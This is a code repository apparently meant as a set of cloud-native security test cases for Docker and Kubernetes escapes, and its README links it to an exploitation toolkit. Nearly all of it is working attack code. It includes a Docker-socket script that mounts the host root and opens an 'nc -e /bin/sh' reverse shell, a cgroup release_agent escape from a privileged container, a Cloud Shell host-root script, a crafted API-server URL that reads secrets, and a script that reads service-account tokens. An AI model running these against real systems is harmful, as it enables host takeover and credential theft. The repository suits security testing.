├── .gitignore
├── privileged
    ├── docker_run_cmd.sh
    ├── k8s_new_cmd.sh
    ├── 1-host-ps.sh
    └── k8s_new.yaml
├── service_account
    ├── exec.sh
    ├── simple.yaml
    ├── masscan_pod.yaml
    └── set_cert.sh
├── try_google_cloud
    ├── 2_host_info.sh
    ├── 1_startup_github_project.sh
    └── host_root.sh
├── docker_api
    ├── 1_curl_api.sh
    ├── 2_ps_and_run_a_container.sh
    └── poc.py
├── set_target.sample.sh
├── get_secert
    └── curl.sh
└── readme.md


/.gitignore:
--------------------------------------------------------------------------------
1 | set_target.sh
2 | nohup.out
3 | .DS_Store
4 | kubectl


--------------------------------------------------------------------------------
/privileged/docker_run_cmd.sh:
--------------------------------------------------------------------------------
1 | docker run --privileged -it alpine sh


--------------------------------------------------------------------------------
/service_account/exec.sh:
--------------------------------------------------------------------------------
1 | # use copy is better
2 | kubectl exec -it service-account-simple -- sh


--------------------------------------------------------------------------------
/try_google_cloud/2_host_info.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | set -ue
4 | 
5 | chroot /rootfs
6 | 
7 | ps auxf | grep kube
8 | docker ps -a
9 | 


--------------------------------------------------------------------------------
/docker_api/1_curl_api.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | set -ue
4 | 
5 | curl -i "http://${docker_http_api}"
6 | curl -i "http://${docker_http_api}/info"
7 | 


--------------------------------------------------------------------------------
/set_target.sample.sh:
--------------------------------------------------------------------------------
1 | # source set_target.sh
2 | # all value is sample
3 | 
4 | export docker_http_api=127.0.0.1:2375
5 | export api_server=127.0.0.0:6443


--------------------------------------------------------------------------------
/try_google_cloud/1_startup_github_project.sh:
--------------------------------------------------------------------------------
1 | open "https://ssh.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/neargle/cloud_native_security_test_case.git"


--------------------------------------------------------------------------------
/privileged/k8s_new_cmd.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | kubectl apply -f "k8s_new.yaml"
4 | kubectl cp "1-host-ps.sh" app-shell-test-2:/tmp/1-host-ps.sh
5 | kubectl exec -it app-shell-test-2 -- sh
6 | 


--------------------------------------------------------------------------------
/docker_api/2_ps_and_run_a_container.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | set -ue
4 | 
5 | docker -H "tcp://${docker_http_api}" ps
6 | docker -H "tcp://${docker_http_api}" run -it -d alpine sleep infinity
7 | docker -H "tcp://${docker_http_api}" ps
8 | 
9 | 


--------------------------------------------------------------------------------
/service_account/simple.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: service-account-simple
 5 | spec:
 6 |   containers:
 7 |   - name: test-container
 8 |     image: "alpine"
 9 |     command: ["/bin/sh", "-c", "sleep infinity"]
10 | 


--------------------------------------------------------------------------------
/service_account/masscan_pod.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: service-account-masscan
 5 | spec:
 6 |   containers:
 7 |   - name: test-container
 8 |     image: "adarnimrod/masscan"
 9 |     command: ["/bin/sh", "-c", "sleep infinity"]
10 | 


--------------------------------------------------------------------------------
/docker_api/poc.py:
--------------------------------------------------------------------------------
 1 | import docker
 2 | client = docker.DockerClient(base_url='unix:///var/run/docker.sock')
 3 | data = client.containers.run(
 4 |     'alpine:latest',
 5 |     r'''sh -c "/usr/bin/nc xxxx 23334 -e /bin/sh" ''',
 6 |     remove=True,
 7 |     volumes={'/': {'bind': '/tmp/root', 'mode': 'rw'}}
 8 | )
 9 | print(data)
10 | 


--------------------------------------------------------------------------------
/get_secert/curl.sh:
--------------------------------------------------------------------------------
1 | # origin url
2 | curl --cacert ./ca.crt --cert ./cert --key key  "https://${apiserver}:6443/api/v1/namespaces/istio-dev/pods/service-account-simple/log?container=test-container"
3 | 
4 | # the hacked url
5 | curl --cacert ./ca.crt --cert ./cert --key key "https://${apiserver}:6443/api/v1/namespaces/${ns}/secrets/${secrets}?feihua=/pods/service-account-simple/log?container=test-container"


--------------------------------------------------------------------------------
/service_account/set_cert.sh:
--------------------------------------------------------------------------------
1 | ./kubectl config set-cluster cfc --server=https://${api_server} --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
2 | ./kubectl config set-context cfc --cluster=cfc
3 | ./kubectl config set-credentials user --token=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
4 | ./kubectl config set-context cfc --user=user
5 | ./kubectl config use-context cfc


--------------------------------------------------------------------------------
/try_google_cloud/host_root.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | set -ue
 4 | 
 5 | export host_docker_sock="unix:///google/host/var/run/docker.sock"
 6 | 
 7 | sudo docker -H ${host_docker_sock} pull alpine:latest
 8 | sudo docker -H ${host_docker_sock} run -d -it --name rshell -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
 9 | sudo docker -H ${host_docker_sock} start rshell
10 | sudo docker -H ${host_docker_sock} exec -it rshell /bin/sh
11 | 


--------------------------------------------------------------------------------
/privileged/1-host-ps.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | set -uex
 4 | 
 5 | mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
 6 |  
 7 | echo 1 > /tmp/cgrp/x/notify_on_release
 8 | host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
 9 | echo "$host_path/cmd" > /tmp/cgrp/release_agent
10 |  
11 | echo '#!/bin/sh' > /cmd
12 | echo "ps aux > $host_path/output" >> /cmd
13 | chmod a+x /cmd
14 |  
15 | sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
16 | 
17 | sleep 2
18 | cat "/output"
19 | 


--------------------------------------------------------------------------------
/privileged/k8s_new.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: app-shell-test-2
 5 | spec:
 6 |   volumes:
 7 |   - name: shared-data
 8 |     emptyDir: {}
 9 |   containers:
10 |   - name: test-container
11 |     image: "alpine"
12 |     securityContext:
13 |         privileged: true
14 |     command: ["/bin/sh", "-c", "while true; do sleep 10000; done"]
15 |     volumeMounts:
16 |     - name: shared-data
17 |       mountPath: /usr/share/nginx/html
18 |   hostNetwork: true
19 |   dnsPolicy: Default


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | 所有的代码都已经集成到了 CDK 的 EXP 中，可参考 [https://github.com/cdk-team/CDK/](https://github.com/cdk-team/CDK/)
 2 | 
 3 |     .
 4 |     ├── docker_api
 5 |     │   ├── 1_curl_api.sh
 6 |     │   └── 2_ps_and_run_a_container.sh
 7 |     ├── nohup.out
 8 |     ├── privileged
 9 |     │   ├── 1-host-ps.sh
10 |     │   ├── docker_run_cmd.sh
11 |     │   ├── k8s_new.yaml
12 |     │   └── k8s_new_cmd.sh
13 |     ├── readme.md
14 |     ├── service_account
15 |     │   ├── exec.sh
16 |     │   ├── kubectl
17 |     │   ├── set_cert.sh
18 |     │   └── simple.yaml
19 |     ├── set_target.sample.sh
20 |     ├── set_target.sh
21 |     └── try_google_cloud
22 |         ├── 1_startup_github_project.sh
23 |         ├── 2_host_info.sh
24 |         └── host_root.sh
25 | 
26 |     4 directories, 17 files
27 | 


--------------------------------------------------------------------------------